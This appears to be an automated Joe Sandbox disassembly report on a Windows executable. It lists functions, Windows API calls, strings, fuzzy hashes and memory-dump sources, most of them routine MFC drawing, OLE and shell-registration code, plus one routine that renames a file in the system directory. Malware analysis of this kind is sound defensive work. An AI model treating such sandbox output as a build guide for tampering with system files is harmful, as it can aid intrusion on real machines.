CreateFontA.GDI32(00000010,00000000,00000384,00000384,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,Arial), ref: 00406A50
CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,Arial), ref: 00406A88
GetSysColor.USER32(00000002), ref: 00406ABC
GetSysColor.USER32(00000002), ref: 00406AE0

Part of subcall function 00406170: GradientFill.MSIMG32(?,?,00000002,00000000,00000001,00000000), ref: 0040621E

Part of subcall function 0042F253: InterlockedDecrement.KERNEL32(-000000F4), ref: 0042F267

GetSysColor.USER32(00000014), ref: 00406BB5
GetSysColor.USER32(00000010), ref: 00406BBA
GetSysColor.USER32(00000009), ref: 00406BDD
GetTextExtentPoint32A.GDI32(?,?,00000008,?), ref: 00406C0E
GetSysColor.USER32(00000014), ref: 00406CB3
GetSysColor.USER32(00000010), ref: 00406CB8
OffsetRect.USER32(?,00000003,00000000), ref: 00406CD0
InflateRect.USER32(?,00000000,000000F6), ref: 00406CDF
GetSysColor.USER32(00000014), ref: 00406CE7
GetSysColor.USER32(00000010), ref: 00406CEC
GetSysColor.USER32(00000010), ref: 00406D3C
GetSysColor.USER32(00000014), ref: 00406D41
OffsetRect.USER32(?,00000000,00000003), ref: 00406D59
InflateRect.USER32(?,000000F6,00000000), ref: 00406D68
GetSysColor.USER32(00000014), ref: 00406D70
GetSysColor.USER32(00000010), ref: 00406D75

Strings

Arial, xrefs: 00406A23, 00406A70

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Color$Rect$CreateFontInflateOffset$CopyDecrementExtentFillGradientInterlockedMetricsPoint32SystemText
String ID: Arial
API String ID: 3818740262-493054409
Opcode ID: fc9e35d08a336f9324300cdc51d003acd062b4515a09879691520119838cdd3b
Instruction ID: 76562c8bbfaf2b1605c72cd9b5ce55b6d8978c3b1e6818131769f91c7f8ff245
Opcode Fuzzy Hash: fc9e35d08a336f9324300cdc51d003acd062b4515a09879691520119838cdd3b
Instruction Fuzzy Hash: F4D15BB0208344AFD714EF64C885F6FBBE8BF88744F104A1DF68697291DB74A905CB66

Function 00411D83 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 229librarymemoryfileCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000105), ref: 00411DA0
wsprintfA.USER32 ref: 00411DC5
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,10000080,00000000), ref: 00411DE1
GetFileSize.KERNEL32(00000000,00000000), ref: 00411DF7
CloseHandle.KERNEL32(00000000), ref: 00411E01
wsprintfA.USER32 ref: 00411E51
MoveFileExA.KERNEL32(?,?,00000003(MOVEFILE_REPLACE_EXISTING|MOVEFILE_COPY_ALLOWED)), ref: 00411E66
FreeLibrary.KERNEL32(00000000), ref: 00411E6D
LoadLibraryA.KERNEL32 ref: 00411E7B
LoadLibraryA.KERNEL32(?), ref: 00411E89
FreeLibrary.KERNEL32(00000000), ref: 00411EC4
GetModuleFileNameA.KERNEL32(00000000,?,0000020A), ref: 00411EDA
LocalAlloc.KERNEL32(00000000,00000000), ref: 00411F1F
LocalAlloc.KERNEL32(00000000,?), ref: 00411F29
LocalLock.KERNEL32(?), ref: 00411F37
LocalLock.KERNEL32(?), ref: 00411F3E
FreeLibrary.KERNEL32(?), ref: 00411FB6
LocalUnlock.KERNEL32(00000000), ref: 00411FCD
LocalFree.KERNEL32(00000000), ref: 00411FD2
LocalUnlock.KERNEL32(00000000), ref: 00411FDD
LocalFree.KERNEL32(00000000), ref: 00411FE2
FreeLibrary.KERNEL32(00000000), ref: 00411FEA
FreeLibrary.KERNEL32(00000000), ref: 00411FF5

Part of subcall function 0041203E: LoadLibraryA.KERNEL32(version.dll,76F90AE0,00000000,00000000,?,?,00411EB9,?,?,?), ref: 0041204A
Part of subcall function 0041203E: GetProcAddress.KERNEL32(00000000,GetFileVersionInfoSizeA), ref: 00412065
Part of subcall function 0041203E: GetProcAddress.KERNEL32(00000000,GetFileVersionInfoA), ref: 00412072
Part of subcall function 0041203E: GetProcAddress.KERNEL32(?,VerQueryValueA), ref: 00412081
Part of subcall function 0041203E: FreeLibrary.KERNEL32(?,?,?,00411EB9,?,?,?), ref: 00412099

Strings

N, xrefs: 00411E0D
%s\odbccp32.bad, xrefs: 00411E4B
%s\%s, xrefs: 00411DBF

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Library$FreeLocal$File$AddressLoadProc$AllocLockUnlockwsprintf$CloseCreateDirectoryHandleModuleMoveNameSizeSystem
String ID: N$%s\%s$%s\odbccp32.bad
API String ID: 650942659-2327847929
Opcode ID: b50fc40f67c29eb788fd741f2fa571c9c6f570ff7cfb1581ec6d15f37b824aa9
Instruction ID: c7e8bd5df3290eecc6d244cf383f51878700449ed9f42dc36eb85d3199d53505
Opcode Fuzzy Hash: b50fc40f67c29eb788fd741f2fa571c9c6f570ff7cfb1581ec6d15f37b824aa9
Instruction Fuzzy Hash: 31810A72D0121DABCF119BE4DC84EEFBBBDAF08351F104166E605B2160D7799A85CF64

Function 004290D0 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0046F280,?,?,?,?,?,?,?,?,?,?,?,?,00428647), ref: 004290DB
GetDC.USER32(00000000), ref: 004290E3
GetDeviceCaps.GDI32(00000000,0000000C), ref: 004290F4
GetDeviceCaps.GDI32(00000000,0000000E), ref: 004290FB
GetSystemMetrics.USER32(00000001), ref: 00429119
GetSystemMetrics.USER32(00000000), ref: 00429124
ReleaseDC.USER32(00000000,00000000), ref: 0042913A
GlobalAddAtomA.KERNEL32(C3d), ref: 00429154
LeaveCriticalSection.KERNEL32(0046F280,?,?,?,?,?,?,?,?,?,?,?,?,00428647), ref: 00429170
GlobalAddAtomA.KERNEL32(C3dNew), ref: 00429187
GlobalAddAtomA.KERNEL32(C3dL), ref: 00429199
GlobalAddAtomA.KERNEL32(C3dH), ref: 004291A6
GlobalAddAtomA.KERNEL32(C3dLNew), ref: 004291CA
GlobalAddAtomA.KERNEL32(C3dHNew), ref: 004291D7
GlobalAddAtomA.KERNEL32(C3dD), ref: 004291FB
GetSystemMetrics.USER32(0000002A), ref: 0042920E
GetClassInfoA.USER32(00000000,0045D018,?), ref: 00429251
GetClassInfoA.USER32(00000000,00008002,?), ref: 0042926E

Strings

C3dNew, xrefs: 00429182
C3dLNew, xrefs: 004291C5
C3dHNew, xrefs: 004291D2
C3dH, xrefs: 004291A1
C3dL, xrefs: 00429194
C3dD, xrefs: 004291F6
C3d, xrefs: 00429149

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
String ID: C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
API String ID: 1233821986-3277416593
Opcode ID: b708da37f16cb847b07e1d6a472a9215c8594601908043b829ad1f7529eab0e8
Instruction ID: e8079377fac5a7af41bab13fb73a933f39d05b249c39ad78d0b5913e2246eb44
Opcode Fuzzy Hash: b708da37f16cb847b07e1d6a472a9215c8594601908043b829ad1f7529eab0e8
Instruction Fuzzy Hash: 6A41F639B40310AAE710AB65FC55B6677A8EB44351F800077E880962A1EBF99C49CF6F

Function 0044414B Relevance: 42.5, APIs: 28, Instructions: 479COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00444150
GetWindowRect.USER32(?,?), ref: 00444194
OffsetRect.USER32(?,?,?), ref: 004441AA
GetSysColor.USER32(00000006), ref: 004441C7
CreateSolidBrush.GDI32(00000000), ref: 004441D0
GetSysColor.USER32(?), ref: 004441F7
CreateSolidBrush.GDI32(00000000), ref: 004441FA
GetSysColor.USER32(?), ref: 00444221
CreateSolidBrush.GDI32(00000000), ref: 00444224
GetSystemMetrics.USER32(00000006), ref: 00444237
GetSystemMetrics.USER32(00000005), ref: 0044423E
GetSystemMetrics.USER32(00000021), ref: 00444245
GetSystemMetrics.USER32(00000020), ref: 0044424B
InflateRect.USER32(?,?,?), ref: 00444283

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MetricsSystem$BrushColorCreateRectSolid$H_prologInflateOffsetWindow
String ID:
API String ID: 1266645593-0
Opcode ID: 057e9c92db7e866f85d20a9250f8e6b4dc6d49d5552f66e9513dcb190b465dd3
Instruction ID: 55cc73d298d115fa454f1ca7fda971d98516062813f838423e59c8a26c721941
Opcode Fuzzy Hash: 057e9c92db7e866f85d20a9250f8e6b4dc6d49d5552f66e9513dcb190b465dd3
Instruction Fuzzy Hash: 2102F372E00219AFDF11DBE4CD49EEEBBB9EF48304F14412AE505E7291DA74AA05CB64

Function 0044C12D Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 47registrywindowCOMMON

Download Yara Rule

APIs

RegisterWindowMessageA.USER32(Native), ref: 0044C14B
RegisterWindowMessageA.USER32(OwnerLink), ref: 0044C154
RegisterWindowMessageA.USER32(ObjectLink), ref: 0044C15E
RegisterWindowMessageA.USER32(Embedded Object), ref: 0044C168
RegisterWindowMessageA.USER32(Embed Source), ref: 0044C172
RegisterWindowMessageA.USER32(Link Source), ref: 0044C17C
RegisterWindowMessageA.USER32(Object Descriptor), ref: 0044C186
RegisterWindowMessageA.USER32(Link Source Descriptor), ref: 0044C190
RegisterWindowMessageA.USER32(FileName), ref: 0044C19A
RegisterWindowMessageA.USER32(FileNameW), ref: 0044C1A4
RegisterWindowMessageA.USER32(Rich Text Format), ref: 0044C1AE
RegisterWindowMessageA.USER32(RichEdit Text and Objects), ref: 0044C1B8

Strings

FileNameW, xrefs: 0044C19C
OwnerLink, xrefs: 0044C14D
ObjectLink, xrefs: 0044C156
Object Descriptor, xrefs: 0044C17E
Native, xrefs: 0044C146
FileName, xrefs: 0044C192
Embedded Object, xrefs: 0044C160
Link Source, xrefs: 0044C174
Link Source Descriptor, xrefs: 0044C188
RichEdit Text and Objects, xrefs: 0044C1B0
Embed Source, xrefs: 0044C16A
Rich Text Format, xrefs: 0044C1A6

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageRegisterWindow
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1814269913-2889995556
Opcode ID: 8c0b00e43b52753520812423598094fe6f0fe588039065f846d206843d56d23a
Instruction ID: c774fb18b94d0f607f240b10dc72b9f6e181d1b40f615a31d6f85641bdd9e417
Opcode Fuzzy Hash: 8c0b00e43b52753520812423598094fe6f0fe588039065f846d206843d56d23a
Instruction Fuzzy Hash: E101ADB0A407885A87307F729C4992BBEE0EEC1B11361492FD5C597652DBBC9449CFC8

Function 00429E50 Relevance: 37.8, APIs: 25, Instructions: 294windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00428360: SetBkColor.GDI32(?), ref: 0042837D
Part of subcall function 00428360: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004283CA
Part of subcall function 00428360: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004283F9
Part of subcall function 00428360: SetBkColor.GDI32(?,?), ref: 00428417
Part of subcall function 00428360: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00428442
Part of subcall function 00428360: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042847C

InflateRect.USER32(?,000000FF,000000FF), ref: 00429E92
IsWindowEnabled.USER32(?), ref: 00429EA5
InflateRect.USER32(?,000000FF,000000FF), ref: 00429ECC
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00429EE3
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00429EFC
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00429F14
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00429F2E
SelectObject.GDI32(?,00000000), ref: 00429F53
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00429F77
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00429F97
SelectObject.GDI32(?,00000000), ref: 00429FAD
PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 00429FDB
PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 00429FFC
InflateRect.USER32(?,000000FF,000000FF), ref: 0042A012
SelectObject.GDI32(?,00000000), ref: 0042A02C
PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 0042A054
IsWindowEnabled.USER32(?), ref: 0042A05F
SetTextColor.GDI32(?,00000000), ref: 0042A070
OffsetRect.USER32(?,00000001,00000001), ref: 0042A0FC

Part of subcall function 00428360: SetBkColor.GDI32(?,00000000), ref: 00428484

DrawTextA.USER32(?,?,?,?,00000020), ref: 0042A134
GetFocus.USER32 ref: 0042A140
InflateRect.USER32(?,00000001,00000001), ref: 0042A151
IntersectRect.USER32(?,?,?), ref: 0042A162
DrawFocusRect.USER32(?,?), ref: 0042A16E
SelectObject.GDI32(?,00000000), ref: 0042A181

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
String ID:
API String ID: 1611134597-0
Opcode ID: eb56bb5ed209a201215a4112138fe1231e988293f442a9a9207adb7a456a083e
Instruction ID: 21b591f78cb707a37c745911afc788aead2647176d5dd8995b976f466bc3e402
Opcode Fuzzy Hash: eb56bb5ed209a201215a4112138fe1231e988293f442a9a9207adb7a456a083e
Instruction Fuzzy Hash: A3B15871208701AFD300CF58DC89E6BBBE8FB88719F404A1CF599D6291D775E941CB6A

Function 0044BAEA Relevance: 35.3, APIs: 4, Strings: 16, Instructions: 341registrywindowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044BAEF

Part of subcall function 00435963: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0043597D
Part of subcall function 00435963: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00435995

Part of subcall function 0042EFC8: InterlockedIncrement.KERNEL32(?), ref: 0042EFDD

ExtractIconA.SHELL32(?,?,00000001), ref: 0044BB9D
DestroyCursor.USER32(00000000), ref: 0044BBBE

Part of subcall function 0042F65E: lstrlenA.KERNEL32(?,00000100,00433FDB,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 0042F671

RegQueryValueA.ADVAPI32(80000000,?,00000000,00000208), ref: 0044BE37

Strings

"%1", xrefs: 0044BC99, 0044BD6E
%s\shell\print\%s, xrefs: 0044BD02, 0044BDB5
/p "%1", xrefs: 0044BCAF
command, xrefs: 0044BD7B, 0044BD83, 0044BDAE, 0044BDD7
NullFile, xrefs: 0044BE8D
,%d, xrefs: 0044BBAF, 0044BBCA
/dde, xrefs: 0044BD51, 0044BD59, 0044BD5F, 0044BD68
%s\shell\printto\%s, xrefs: 0044BD2D, 0044BDDE
%s\ShellNew, xrefs: 0044BE7F
[open("%1")], xrefs: 0044BCE1
[printto("%1","%2","%3","%4")], xrefs: 0044BD3C
%s\DefaultIcon, xrefs: 0044BC5F
%s\shell\open\%s, xrefs: 0044BCD2, 0044BD87
/pt "%1" "%2" "%3" "%4", xrefs: 0044BCBC
[print("%1")], xrefs: 0044BD11
ddeexec, xrefs: 0044BCC6, 0044BCCE, 0044BCFB, 0044BD26

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Name$CursorDestroyExtractFileH_prologIconIncrementInterlockedModulePathQueryShortValuelstrlen
String ID: "%1"$ /dde$ /p "%1"$ /pt "%1" "%2" "%3" "%4"$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$,%d$NullFile$[open("%1")]$[print("%1")]$[printto("%1","%2","%3","%4")]$command$ddeexec
API String ID: 1856554213-4043335175
Opcode ID: 1c9a317ec6ff443a545f826df39a07937177fe01db8930036e4183b77bef5c82
Instruction ID: d170acbeed4f4314570cb9b36c8a252f287c7ee281689072ba70733a4770cf42
Opcode Fuzzy Hash: 1c9a317ec6ff443a545f826df39a07937177fe01db8930036e4183b77bef5c82
Instruction Fuzzy Hash: E3D19071D00219EBDF10EBE5DD85AEEBBB9EF14305F54402AF505B2192D7389E08CBA9

Function 00430AF9 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 170stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B122: TlsGetValue.KERNEL32(0046D38C,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000,?,0042B77C,00000000,00000000,00000000,00000000), ref: 0044B161

CallNextHookEx.USER32(?,00000003,?,?), ref: 00430B23
GetClassLongA.USER32(?,000000E6), ref: 00430B6A
GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 00430B96
lstrcmpiA.KERNEL32(?,ime), ref: 00430BA5
GetWindowLongA.USER32(?,000000FC), ref: 00430C18
SetWindowLongA.USER32(?,000000FC,00000000), ref: 00430C39

Strings

ime, xrefs: 00430B9F
AfxOldWndProc423, xrefs: 00430C7A, 00430C7F, 00430C8A, 00430C92, 00430C9B
`k, xrefs: 00430BE6

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
String ID: AfxOldWndProc423$ime$`k
API String ID: 3731301195-1148904656
Opcode ID: 765706c6024d04b346f2ee796ca743c0844fa054798b91832b80581c33a08033
Instruction ID: 3ae5c80ab4b187797ee1cde7fc638cd9847d51ac1ce5cd24cd0aee5ddff956b1
Opcode Fuzzy Hash: 765706c6024d04b346f2ee796ca743c0844fa054798b91832b80581c33a08033
Instruction Fuzzy Hash: 1551D371500315ABCB159F64CC68B6F7BB8BF08362F10632AF816A7292D738D940CB98

Function 0042A6E0 Relevance: 30.2, APIs: 20, Instructions: 246COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,00000000), ref: 0042A725
CallWindowProcA.USER32(00000000), ref: 0042A74D

Part of subcall function 00428280: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 004282A6
Part of subcall function 00428280: RemovePropA.USER32(?,00000000), ref: 004282BE
Part of subcall function 00428280: RemovePropA.USER32(?,00000000), ref: 004282CA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 92fb1ce42494d45f0b72aa0b8cab6052470d164b5629ada7fb9f124f731c9045
Instruction ID: b075bd67cb56e993a1fdf05c07fec387d0c2d4de908bfd030862a155e69881e4
Opcode Fuzzy Hash: 92fb1ce42494d45f0b72aa0b8cab6052470d164b5629ada7fb9f124f731c9045
Instruction Fuzzy Hash: 9C614A727457256BD220A714FC58FBF7768EB82371F900536FE0092391DA2C991186BF

Function 004481F4 Relevance: 28.8, APIs: 19, Instructions: 266windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004481F9
CreateRectRgnIndirect.GDI32(?), ref: 0044823C
CopyRect.USER32(?,?), ref: 00448252
InflateRect.USER32(?,?,?), ref: 00448268
IntersectRect.USER32(?,?,?), ref: 00448279
CreateRectRgnIndirect.GDI32(?), ref: 00448283
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00448296
CombineRgn.GDI32(?,?,?,00000003), ref: 004482C0
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0044830B
SetRectRgn.GDI32(?,?,?,?,?), ref: 00448328
CopyRect.USER32(?,?), ref: 00448333
InflateRect.USER32(?,?,?), ref: 00448349
IntersectRect.USER32(?,?,?), ref: 00448358
SetRectRgn.GDI32(?,?,?,?,?), ref: 0044836D
CombineRgn.GDI32(?,?,?,00000003), ref: 0044838E
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 004483A6
CombineRgn.GDI32(?,?,?,00000003), ref: 004483D0

Part of subcall function 00448181: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,5!D), ref: 004481C0
Part of subcall function 00448181: CreatePatternBrush.GDI32(00000000), ref: 004481CD
Part of subcall function 00448181: DeleteObject.GDI32(00000000), ref: 004481D9

Part of subcall function 00438838: SelectClipRgn.GDI32(?,00000000), ref: 0043885A
Part of subcall function 00438838: SelectClipRgn.GDI32(?,?), ref: 00438870

Part of subcall function 00438472: SelectObject.GDI32(?,00000000), ref: 00438494
Part of subcall function 00438472: SelectObject.GDI32(?,?), ref: 004384AA

PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00448426
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0044847A

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prologPattern
String ID:
API String ID: 4023391435-0
Opcode ID: 2409a836a299e66457d3a834ab81db96096e48a921ec0c138ad43a03d419b69d
Instruction ID: d4b5bc6bbd20429f50f9e858c66a8a553444acd3c3e2d1b66ad0889f8afbad08
Opcode Fuzzy Hash: 2409a836a299e66457d3a834ab81db96096e48a921ec0c138ad43a03d419b69d
Instruction Fuzzy Hash: 5BA1F672900209AFCF05EFA4D995DEEBBB9FF18305F14411AF906A3251DB38AE05CB64

Function 0044D557 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 210memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,0045B7F8), ref: 0044D5D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 0044D5F5
SysAllocString.OLEAUT32(?), ref: 0044D5FB
lstrlenA.KERNEL32(?,0045B7F8), ref: 0044D622
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 0044D647
SysAllocString.OLEAUT32(?), ref: 0044D64D
